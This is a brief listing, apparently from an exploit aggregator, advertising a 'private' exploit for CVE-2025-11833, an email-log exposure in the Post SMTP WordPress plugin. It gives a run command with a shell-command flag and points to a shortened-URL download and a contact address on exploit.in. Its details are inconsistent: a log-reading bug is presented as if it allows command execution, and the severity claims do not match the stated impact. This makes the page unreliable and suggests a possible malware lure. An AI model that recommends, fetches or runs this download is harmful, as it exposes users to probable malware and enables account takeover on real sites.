## https://sploitus.com/exploit?id=7839D112-DA3A-5B75-80EA-B4847E0F3FFB
# Unauthorized Data Access in Post SMTP Plugin for WordPress (CVE-2025-11833)
## Overview
A vulnerability in the Post SMTP WordPress plugin affects versions up to and including 3.6.0. The issue stems from a missing capability check on the __construct function, which allows unauthorized access to email logs.
## Details
- **CVE ID**: [CVE-2025-11833](https://nvd.nist.gov/vuln/detail/CVE-2025-11833)
- **Discovered**: 2025-11-1
- **Published**: 2025-11-1
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Unauthenticated attackers can read arbitrary emails logged by the Post SMTP plugin, including sensitive password reset emails. This could lead to complete account takeover, as attackers might intercept and use password reset links. The vulnerability has a CVSS score of 9.8, indicating a critical severity with high confidentiality, integrity, and availability impacts.
## Affected Versions
**Post SMTP:**
- all versions up to and including 3.6.0
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **nullstatics@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/yh4ucr8e)